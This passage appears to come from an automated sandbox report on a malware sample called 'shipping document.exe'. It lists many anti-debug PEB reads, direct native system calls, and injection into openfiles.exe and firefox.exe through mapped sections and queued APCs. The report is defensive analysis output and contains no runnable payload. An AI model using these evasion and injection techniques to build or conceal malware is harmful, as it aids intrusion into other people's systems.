              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0177260B mov eax, dword ptr fs:[00000030h]2_2_0177260B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE6F2 mov eax, dword ptr fs:[00000030h]2_2_017DE6F2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E06F1 mov eax, dword ptr fs:[00000030h]2_2_017E06F1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E06F1 mov eax, dword ptr fs:[00000030h]2_2_017E06F1
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0179A6C7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A6C7 mov eax, dword ptr fs:[00000030h]2_2_0179A6C7
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017966B0 mov eax, dword ptr fs:[00000030h]2_2_017966B0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C6A6 mov eax, dword ptr fs:[00000030h]2_2_0179C6A6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764690 mov eax, dword ptr fs:[00000030h]2_2_01764690
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764690 mov eax, dword ptr fs:[00000030h]2_2_01764690
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182866E mov eax, dword ptr fs:[00000030h]2_2_0182866E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182866E mov eax, dword ptr fs:[00000030h]2_2_0182866E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC97C mov eax, dword ptr fs:[00000030h]2_2_017EC97C
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E mov eax, dword ptr fs:[00000030h]2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E mov edx, dword ptr fs:[00000030h]2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017A096E mov eax, dword ptr fs:[00000030h]2_2_017A096E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01786962 mov eax, dword ptr fs:[00000030h]2_2_01786962
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01786962 mov eax, dword ptr fs:[00000030h]2_2_01786962
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01786962 mov eax, dword ptr fs:[00000030h]2_2_01786962
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E0946 mov eax, dword ptr fs:[00000030h]2_2_017E0946
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182A9D3 mov eax, dword ptr fs:[00000030h]2_2_0182A9D3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E892A mov eax, dword ptr fs:[00000030h]2_2_017E892A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F892B mov eax, dword ptr fs:[00000030h]2_2_017F892B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC912 mov eax, dword ptr fs:[00000030h]2_2_017EC912
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758918 mov eax, dword ptr fs:[00000030h]2_2_01758918
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758918 mov eax, dword ptr fs:[00000030h]2_2_01758918
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE908 mov eax, dword ptr fs:[00000030h]2_2_017DE908
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DE908 mov eax, dword ptr fs:[00000030h]2_2_017DE908
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017929F9 mov eax, dword ptr fs:[00000030h]2_2_017929F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017929F9 mov eax, dword ptr fs:[00000030h]2_2_017929F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE9E0 mov eax, dword ptr fs:[00000030h]2_2_017EE9E0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0176A9D0 mov eax, dword ptr fs:[00000030h]2_2_0176A9D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017949D0 mov eax, dword ptr fs:[00000030h]2_2_017949D0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F69C0 mov eax, dword ptr fs:[00000030h]2_2_017F69C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834940 mov eax, dword ptr fs:[00000030h]2_2_01834940
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E89B3 mov esi, dword ptr fs:[00000030h]2_2_017E89B3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E89B3 mov eax, dword ptr fs:[00000030h]2_2_017E89B3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017E89B3 mov eax, dword ptr fs:[00000030h]2_2_017E89B3
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017729A0 mov eax, dword ptr fs:[00000030h]2_2_017729A0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017609AD mov eax, dword ptr fs:[00000030h]2_2_017609AD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017609AD mov eax, dword ptr fs:[00000030h]2_2_017609AD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01804978 mov eax, dword ptr fs:[00000030h]2_2_01804978
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01804978 mov eax, dword ptr fs:[00000030h]2_2_01804978
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE872 mov eax, dword ptr fs:[00000030h]2_2_017EE872
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EE872 mov eax, dword ptr fs:[00000030h]2_2_017EE872
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6870 mov eax, dword ptr fs:[00000030h]2_2_017F6870
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6870 mov eax, dword ptr fs:[00000030h]2_2_017F6870
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01790854 mov eax, dword ptr fs:[00000030h]2_2_01790854
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764859 mov eax, dword ptr fs:[00000030h]2_2_01764859
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01764859 mov eax, dword ptr fs:[00000030h]2_2_01764859
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01772840 mov ecx, dword ptr fs:[00000030h]2_2_01772840
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_018308C0 mov eax, dword ptr fs:[00000030h]2_2_018308C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179A830 mov eax, dword ptr fs:[00000030h]2_2_0179A830
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov ecx, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01782835 mov eax, dword ptr fs:[00000030h]2_2_01782835
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182A8E4 mov eax, dword ptr fs:[00000030h]2_2_0182A8E4
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC810 mov eax, dword ptr fs:[00000030h]2_2_017EC810
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C8F9 mov eax, dword ptr fs:[00000030h]2_2_0179C8F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179C8F9 mov eax, dword ptr fs:[00000030h]2_2_0179C8F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178E8C0 mov eax, dword ptr fs:[00000030h]2_2_0178E8C0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180483A mov eax, dword ptr fs:[00000030h]2_2_0180483A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180483A mov eax, dword ptr fs:[00000030h]2_2_0180483A
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017EC89D mov eax, dword ptr fs:[00000030h]2_2_017EC89D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760887 mov eax, dword ptr fs:[00000030h]2_2_01760887
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0175CB7E mov eax, dword ptr fs:[00000030h]2_2_0175CB7E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01758B50 mov eax, dword ptr fs:[00000030h]2_2_01758B50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814BB0 mov eax, dword ptr fs:[00000030h]2_2_01814BB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814BB0 mov eax, dword ptr fs:[00000030h]2_2_01814BB0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6B40 mov eax, dword ptr fs:[00000030h]2_2_017F6B40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017F6B40 mov eax, dword ptr fs:[00000030h]2_2_017F6B40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180EBD0 mov eax, dword ptr fs:[00000030h]2_2_0180EBD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EB20 mov eax, dword ptr fs:[00000030h]2_2_0178EB20
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EB20 mov eax, dword ptr fs:[00000030h]2_2_0178EB20
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DEB1D mov eax, dword ptr fs:[00000030h]2_2_017DEB1D
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834B00 mov eax, dword ptr fs:[00000030h]2_2_01834B00
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EBFC mov eax, dword ptr fs:[00000030h]2_2_0178EBFC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768BF0 mov eax, dword ptr fs:[00000030h]2_2_01768BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768BF0 mov eax, dword ptr fs:[00000030h]2_2_01768BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768BF0 mov eax, dword ptr fs:[00000030h]2_2_01768BF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017ECBF0 mov eax, dword ptr fs:[00000030h]2_2_017ECBF0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01828B28 mov eax, dword ptr fs:[00000030h]2_2_01828B28
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01828B28 mov eax, dword ptr fs:[00000030h]2_2_01828B28
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01780BCB mov eax, dword ptr fs:[00000030h]2_2_01780BCB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01780BCB mov eax, dword ptr fs:[00000030h]2_2_01780BCB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01780BCB mov eax, dword ptr fs:[00000030h]2_2_01780BCB
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760BCD mov eax, dword ptr fs:[00000030h]2_2_01760BCD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760BCD mov eax, dword ptr fs:[00000030h]2_2_01760BCD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760BCD mov eax, dword ptr fs:[00000030h]2_2_01760BCD
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0182AB40 mov eax, dword ptr fs:[00000030h]2_2_0182AB40
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01808B42 mov eax, dword ptr fs:[00000030h]2_2_01808B42
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770BBE mov eax, dword ptr fs:[00000030h]2_2_01770BBE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770BBE mov eax, dword ptr fs:[00000030h]2_2_01770BBE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814B4B mov eax, dword ptr fs:[00000030h]2_2_01814B4B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01814B4B mov eax, dword ptr fs:[00000030h]2_2_01814B4B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180EB50 mov eax, dword ptr fs:[00000030h]2_2_0180EB50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01832B57 mov eax, dword ptr fs:[00000030h]2_2_01832B57
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01834A80 mov eax, dword ptr fs:[00000030h]2_2_01834A80
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017DCA72 mov eax, dword ptr fs:[00000030h]2_2_017DCA72
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179CA6F mov eax, dword ptr fs:[00000030h]2_2_0179CA6F
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01766A50 mov eax, dword ptr fs:[00000030h]2_2_01766A50
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01770A5B mov eax, dword ptr fs:[00000030h]2_2_01770A5B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01784A35 mov eax, dword ptr fs:[00000030h]2_2_01784A35
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0178EA2E mov eax, dword ptr fs:[00000030h]2_2_0178EA2E
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179CA24 mov eax, dword ptr fs:[00000030h]2_2_0179CA24
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017ECA11 mov eax, dword ptr fs:[00000030h]2_2_017ECA11
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0179AAEE mov eax, dword ptr fs:[00000030h]2_2_0179AAEE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01760AD0 mov eax, dword ptr fs:[00000030h]2_2_01760AD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01794AD0 mov eax, dword ptr fs:[00000030h]2_2_01794AD0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B6ACC mov eax, dword ptr fs:[00000030h]2_2_017B6ACC
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01768AA0 mov eax, dword ptr fs:[00000030h]2_2_01768AA0
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017B6AA4 mov eax, dword ptr fs:[00000030h]2_2_017B6AA4
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0180EA60 mov eax, dword ptr fs:[00000030h]2_2_0180EA60
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_01798A90 mov edx, dword ptr fs:[00000030h]2_2_01798A90
              Source: C:\Users\user\Desktop\shipping document.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeThread register set: target process: 6044Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeThread APC queued: target process: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeJump to behavior
